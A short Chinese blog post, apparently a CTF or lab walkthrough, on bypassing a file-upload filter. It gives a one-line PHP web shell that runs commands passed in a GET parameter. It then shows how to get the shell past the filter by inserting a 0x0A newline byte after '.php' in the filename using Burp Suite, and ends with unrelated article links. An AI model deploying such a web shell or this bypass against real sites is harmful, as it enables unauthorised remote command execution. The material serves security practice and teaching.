Web页面:
新建一个一句话木马:
0.php
<?php system($_GET[0]); ?>上传木马, burpsuite 抓包。
直接上传是回显 bad file。
我们查看数据包的二进制内容(hex),内容是以16进制显示的,找到文件名那一栏,在 .php 的后面添加换行符,在ASCII编码表中,回车符的16进制表示是0x0D,而换行符的16进制表示是0x0A,所以在这里填 0a。
send 后,我们访问一下。发现木马上传成功。
相关推荐
Web3VentureView1 分钟前
SYNBO 协议亮相 ChainThink “Meme 回归” AMA:市场奖励机制深度剖析翔云1234561 小时前
(MySQLdb._exceptions.OperationalError) (2006, ‘MySQL server has gone away‘)Xの哲學1 小时前
Linux设备驱动模型深度解剖: 从设计哲学到实战演练duyinbi75171 小时前
改进YOLO13模型:C3k2与PPA优化在油田工人安全装备检测与行为识别中的应用2401_832298102 小时前
芯片级机密计算,天翼云CSV3筑牢数据“可用不可见”防线tjjingpan2 小时前
HCIP-Datacom Core Technology V1.0_13 园区网典型技术应用概述松涛和鸣2 小时前
DAY55 Getting Started with ARM and IMX6ULLJ_liaty2 小时前
基于ip2region.xdb数据库从IP获取到属地解析全攻略无线图像传输研究探索2 小时前
如何提升机器狗 “超视距” 作战能力?成工小白3 小时前
网络复习(1)